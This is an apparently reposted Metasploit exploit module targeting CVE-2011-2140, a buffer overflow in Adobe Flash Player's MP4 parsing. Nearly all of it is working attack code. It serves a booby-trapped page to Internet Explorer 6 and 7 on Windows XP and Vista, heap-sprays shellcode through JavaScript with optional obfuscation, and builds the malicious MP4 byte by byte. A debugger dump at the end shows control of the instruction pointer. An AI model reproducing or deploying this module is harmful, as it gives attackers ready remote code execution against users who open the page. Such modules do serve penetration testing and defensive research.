Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
|
来源:http://www.metasploit.com 作者:sinn3r 发布时间:2012-02-13
|
|
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn't included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Gavrun', #RCA 'Abysssec', #PoC 'sinn3r' #Metasploit ], 'References' => [ [ 'CVE', '2011-2140' ], [ 'BID', '49083' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-276/' ], [ 'URL', 'http://www.kahusecurity.com/2011/cve-2011-2140-caught-in-the-wild/' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-21.html' ], [ 'URL', 'http://0x1byte.blogspot.com/2011/11/analysis-of-cve-2011-2140-adobe-flash.html' ], [ 'URL', 'http://www.abysssec.com/blog/2012/01/31/exploiting-cve-2011-2140-another-flash-player-vulnerability/' ] ], 'Payload' => { 'BadChars' => "\x00", 'StackAdjustment' => -3500 }, 'DefaultOptions' => { 'ExitFunction' => "seh", 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x600' } ], #0x5f4 = spot on [ 'IE 7 on Windows XP SP3 / Vista', { 'Offset' => '0x600' } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 9 2011", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']), OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player']) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] elsif agent =~ /MSIE 7/ return targets[2] else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}") send_not_found(cli) return end # The SWF requests our MP4 trigger if request.uri =~ /\.mp4$/ print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...") #print_error("Sorry, not sending you the mp4 for now") #send_not_found(cli) send_response(cli, @mp4, {'Content-Type'=>'video/mp4'}) return end # Set payload depending on target p = payload.encoded js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } JS js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'] mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4" swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}" html = %Q| <html> <head> <script> #{js} </script> </head> <body> <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}"> <param name="movie" value="#{swf_uri}"> </object> </body> </html> | html = html.gsub(/^\t\t/, '') print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) end def exploit @mp4 = create_mp4 super end def create_mp4 ftypAtom = "\x00\x00\x00\x20" #Size ftypAtom << "ftypisom" ftypAtom << "\x00\x00\x02\x00" ftypAtom << "isomiso2avc1mp41" mdatAtom = "\x00\x00\x00\x10" #Size mdatAtom << "mdat" mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF" moovAtom1 = "\x00\x00\x08\x83" #Size moovAtom1 << "moov" #Move header box header moovAtom1 << "\x00\x00\x00" moovAtom1 << "lmvhd" # Type moovAtom1 << "\x00\x00\x00\x00" # Version/Flags moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time moovAtom1 << "\x00\x00\x03\xE8" # Time scale moovAtom1 << "\x00\x00\x2F\x80" # Duration moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA" moovAtom1 << "trak" # Track box header moovAtom1 << "\x00\x00\x00\x5C" moovAtom1 << "tkhd" moovAtom1 << "\x00\x00\x00\x0F" moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02" moovAtom1 << "rmdia" moovAtom1 << "\x00\x00\x00\x20" # Size moovAtom1 << "mdhd" # Media header box moovAtom1 << "\x00\x00\x00\x00" # Version/Flags moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time moovAtom1 << "\x00\x00\x00\x01" # Time scale moovAtom1 << "\x00\x00\x00\x0C" # Duration moovAtom1 << "\x55\xC4\x00\x00" moovAtom1 << "\x00\x00\x00\x2D" # Size moovAtom1 << "hdlr" # Handler Reference header moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "vide" # Handler type moovAtom1 << "\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "VideoHandler" # Handler name moovAtom1 << "\x00\x00\x00\x02\x1D" moovAtom1 << "minf" moovAtom1 << "\x00\x00\x00\x14" moovAtom1 << "vmhd" moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24" moovAtom1 << "dinf" # Data information box header moovAtom1 << "\x00\x00\x00\x1c" moovAtom1 << "dref" # Data reference box moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01" moovAtom1 << "\x00\x00\x00\x0C" # Size moovAtom1 << "url " # Data entry URL box moovAtom1 << "\x00\x00\x00\x01" # Location / version / flags moovAtom1 << "\x00\x00\x09\xDD" # Size moovAtom1 << "stbl" moovAtom1 << "\x00\x00\x08\x99" moovAtom1 << "stsd" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01" moovAtom1 << "\x00\x00\x08\x89" # Size moovAtom1 << "avc1" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x01\x42" # Width moovAtom1 << "\x01\x42" # Height moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom1 << "\x18" # Depth moovAtom1 << "\xFF\xFF" moovAtom1 << "\x00\x00\x08\x33" # Size moovAtom1 << "avcC" moovAtom1 << "\x01" # Config version moovAtom1 << "\x64" # Avc profile indication moovAtom1 << "\x00" # Compatibility moovAtom1 << "\x15" # Avc level indication moovAtom1 << "\xFF\xE1" # Although the fields have different values, they all become 0x0c0c0c0c # in memory. cycle = "\x00\x00\x00" cycle << "\x30\x30\x30\x30" #6th cycle << "\x00\x00\x00" cycle << "\x18\x18\x18\x18" #7th cycle << "\x00\x00\x00" cycle << "\x0c\x0c\x0c\x0c" #8th cycle << "\x00\x00\x00" cycle << "\x06\x06\x06\x06" #1st cycle << "\x00\x00\x00" cycle << "\x03\x03\x03\x03" cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00" cycle << "\xc0\xc0\xc0\xc0" # 4th cycle << "\x00\x00\x00" cycle << "\x60\x60\x60\x60" spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF" spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC" spsunit << cycle * 35 spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C" moovAtom2 = "\x00\x00\x00\x18" moovAtom2 << "stts" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01" moovAtom2 << "\x00\x00\x00\x14" moovAtom2 << "stss" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" moovAtom2 << "pctts" moovAtom2 << "\x00\x00\x00\x00\x00\x00" moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00" moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02" moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00" moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02" moovAtom2 << "\x00\x00\x00\x1C" moovAtom2 << "stsc" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01" moovAtom2 << "\x00\x00\x00\x44" moovAtom2 << "stsz" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07" moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39" moovAtom2 << "\x00\x00\x00\x40" moovAtom2 << "stco" moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4" moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5" moovAtom = moovAtom1 + spsunit + moovAtom2 m = ftypAtom + mdatAtom + moovAtom return m end end =begin C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx Flash10u+0x5b4e8: Missing image name, possible paged-out or corrupt data. 1f06b4e8 8901 mov dword ptr [ecx],eax ds:0023:020c0000=00905a4d 0:008> !exchain 020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c) ECX points to 0x0c0c0c0c at the time of the crash: 0:008> r eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000 eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246 <Unloaded_ud.drv>+0xc0c0c0b: 0c0c0c0c ?? ??? Example of SWF player URI: http://www.jeroenwijering.com/embed/mediaplayer.swf To-do: IE 8 target =end
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|